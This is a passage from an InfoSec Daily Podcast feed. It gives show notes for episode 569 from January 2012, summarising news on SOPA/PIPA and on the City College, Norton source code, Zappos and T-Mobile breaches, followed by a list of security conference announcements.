	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://projects.ajc.com/gallery/view/metro/atlanta/mlk-day-atlanta-011612"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://projects.ajc.com/gallery/view/metro/atlanta/mlk-day-atlanta-011612</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Happy </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Martin Luther King, Jr. Day. &nbsp;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.examiner.com/computers-in-denver/house-kills-sopa"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.examiner.com/computers-in-denver/house-kills-sopa</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a surprise move today, Representative Eric Cantor(R-VA) announced that he will stop all action on SOPA, effectively killing the bill. This move was most likely due to several things. One of those things is that SOPA and PIPA met huge online protest against the bills. Another reason would be that the White House threatened to veto the bill if it had passed. However, it isn&#39;t quite time yet to celebrate, as PIPA(the Senate&#39;s version of SOPA) is still up for consideration.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The online protests about the bill were surprising and large. They ranged anywhere from callng Representatives, companies, and senators to get them to change their mind, to actively moving domain&#39;s away from and targeting the business model of the companies that supported/lobbied for the bill. GoDaddy lost well over 100,000 domains in the space of about 10 days due to their involvement with these bills, along with other various targets. Reddit in particular has been influential in turning the tide against SOPA and PIPA, and is a good demonstration of how the Internet enables Democracy.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.techdirt.com/articles/20120116/02442717414/harry-reid-says-hes-concerned-pipa-will-break-internet-we-must-move-forward-with-it-because-jobs.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techdirt.com/articles/20120116/02442717414/harry-reid-says-hes-concerned-pipa-will-break-internet-we-must-move-forward-with-it-because-jobs.shtml</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a short appearance on </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meet the Press</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Sunday, Senate leader Harry Reid continued to insist that</span><a href="http://www.msnbc.msn.com/id/3032608/vp/46004838#46004838"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the Senate intended to move forward with PIPA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, despite the widespread concerns, despite the White House&#39;s statement against the bill, and despite multiple Senators &#8212; including bill co-sponsors &#8212; asking him to hold off putting the bill to a vote. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What&#39;s stunning is how misleading Senator Reid is being here. First, he claims that the bill is about &quot;jobs,&quot; despite a total lack of evidence that that&#39;s true. In fact, as has been noted plenty of times here, the part of the economy that </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">is</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> creating jobs &#8212; the startup/tech sector &#8212; is the one who gets burdened by this bill. David Gregory then responds by pointing out that people keep pointing out to him online that this bill isn&#39;t really about jobs, and will harm the internet. Reid then tries to pretend that this is a new revelation. He notes that it was &quot;reported out of the committee unanimously&quot; back in May. That&#39;s true, but that was back before most people understood the bill, or the internet had spoken out. Even then, many of us were quite clear in speaking out about why this bill was a problem. But Harry Reid pretends that it&#39;s &quot;just in the last few weeks&quot; that anyone has raised concerns.&quot; That&#39;s flat out ridiculous.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2012/01/12/MN4Q1MO9JK.DTL"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2012/01/12/MN4Q1MO9JK.DTL</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Personal banking information and other data from perhaps tens of thousands of students, faculty and administrators at City College of San Francisco have been stolen in what is being called &quot;an infestation&quot; of computer viruses with origins in criminal networks in Russia, China and other countries, The Chronicle has learned.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At work for more than a decade, the viruses were detected a few days after</span><a href="http://www.sfgate.com/thanksgiving/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Thanksgiving</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, when the college&#39;s data security monitoring service detected an unusual pattern of computer traffic, flagging trouble.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It appeared at first that the problem was contained in a single computer lab at Cloud Hall on the Phelan Avenue campus, one of a dozen City College sites around the city. David Hotchkiss, the chief technology officer, immediately shut the lab down and reported the problem to Chancellor Don Griffin, General Counsel Scott Dickey and Board of Trustees President John Rizzo.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But a closer look revealed a far more nefarious situation, which had been lurking within the college&#39;s electronic systems since 1999. For now, it&#39;s still going on. So far, no cases of identify theft have been linked to the breach. That may change as the investigation continues, and college officials said they might need to bring in the FBI.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The college&#39;s payroll, admissions and accounting systems have yet to be analyzed for the viruses.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://thehackernews.com/2012/01/hacker-will-release-full-norton.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2012/01/hacker-will-release-full-norton.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker with code name of &#39;Yama Tough&#39; announce via Twitter that on Tuesday he will leak the full source code for Symantec Corp&#39;s flagship Norton Antivirus software which is 1.7GB src.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week Yama Tough has released fragments of source code from Symantec products along with a cache of emails. The hacker says all the data was taken from Indian government servers. Yama Tough is trying to prove that Indian government was snooping on America and China.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">YamaTough said via Twitter &quot;Pass it on to forensics and win the lawsuit,&quot;.He has offered support to an American man who filed a lawsuit against Symantec Corp by publishing source code from a 2006 version of Norton Utilities, a software program at the heart of the legal dispute. It was not immediately clear how the source code might help the case.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Symantec spokesperson commented on the incident:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are still gathering information on the details and are not in a position to provide specifics on the third party involved. Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec&rsquo;s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec has confirmed that hackers have managed to steal a portion of Norton Antivirus&rsquo; source code, used in two discontinued enterprise products. According to Symantec, the company&rsquo;s servers weren&rsquo;t hacked, but the hackers managed to get the code from a third-party server.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/zappos-says-24-million-customers-affected-data-breach-011612"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/zappos-says-24-million-customers-affected-data-breach-011612</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online retailer Zappos said that its network has been compromised and attackers were able to access personal information belonging to more than 24 million of its customers. Zappos said that its database that contains customers&#39; credit card numbers was not compromised, however.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We were recently the victim of a cyber attack by a criminal who gained access to parts of our internal network and systems through one of our servers in Kentucky. We are cooperating with law enforcement to undergo an exhaustive investigation,&quot; Tony Hsieh, the company CEO, said in an</span><a href="http://blogs.zappos.com/securityemail"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> email to employees</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Because of the nature of the investigation, the information in this email is being sent a bit more formally, and unfortunately we are not able to provide any more details about specifics of the attack beyond what is in this email and the link at the end of this email, but we can say that THE DATABASE THAT STORES OUR CUSTOMERS&#39; CRITICAL CREDIT CARD AND OTHER PAYMENT DATA WAS NOT AFFECTED OR ACCESSED.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zappos is a large retailer, mainly known for its shoe business. But the company also sells a large range of other goods, including clothing and accessories. As a result of the data breach, Zappos already has expired all of the affected customers&#39; passwords and is requiring them to reset their credentials.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adrian&rsquo;s top Zappos jokes:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Hacking Zappos was no mean feet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Servers at Zappos were probably </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">laced</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with malware.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. I bet the network admins at Zappos feel like real heels.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Details are still coming in about the compromise, so we are still waiting for the other shoe to drop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. They will have a hard time capturing the culprit, &nbsp;he was probably behind 7 SOCKS proxies. <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/T-Mobile-Hacked-by-TeaMp0isoN-Administrators-and-Staff-Exposed-Exclusive-246643.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/T-Mobile-Hacked-by-TeaMp0isoN-Administrators-and-Staff-Exposed-Exclusive-246643.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The infamous hacktivist collective TeaMp0isoN breached the official website of T-Mobile, one of the largest wireless communications providers in the world, leaking sensitive login information that belongs to their staff and administrators.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers posted a document on </span><a href="http://pastebin.com/HhaPZ1BE"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to prove the success of the operation, but we&rsquo;ve contacted them to find out the details and the main reason why T-Mobile is a target.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;They are known to be supporting the Big Brother Patriot Act law. Any cell phone company doing so I would see as a target,&rdquo; said one of the hackers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;One of the main reasons for the hack is because they are corrupted, but we also wanted to show how weak their security is.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers found SQL injection vulnerabilities on t-mobile.com and newsroom.t-mobile.com and managed to get a hold of the names, email addresses, phone numbers and passwords of the administrators and staff members.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Look at the passwords, epic fail. All the passwords are manually given to staff via an admin who uses the same set of passwords,&rdquo; the hackers said after analyzing the data.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve tried to get in touch with the company for a statement, but the media contact page is hosted on one of the breached subdomains and it&rsquo;s currently taken offline, which probably means that they&#39;re currently dealing with the incident.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-569-happy-mlk-death-of-sopa-dataexfil-norton-source-code-zappos-teamp0ison/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3382/0/infosec-daily-podcast-episode-569.mp3" length="19188651" type="audio/mpeg" />
		<itunes:duration>0:39:56</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 569 for January 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 569 for January 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	When: January 18, 2012
	Where: NY Tech Meetup HQ, New York City
	http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-568-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-568-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 15 Jan 2012 03:06:35 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3380</guid>
		<description><![CDATA[&#160; Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 568 for January 14, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester. Guests: spridel, aricon, hackett, gozes, and connection. Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 568 for January 14, 2012. &nbsp;</span><span>Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.</span></p>
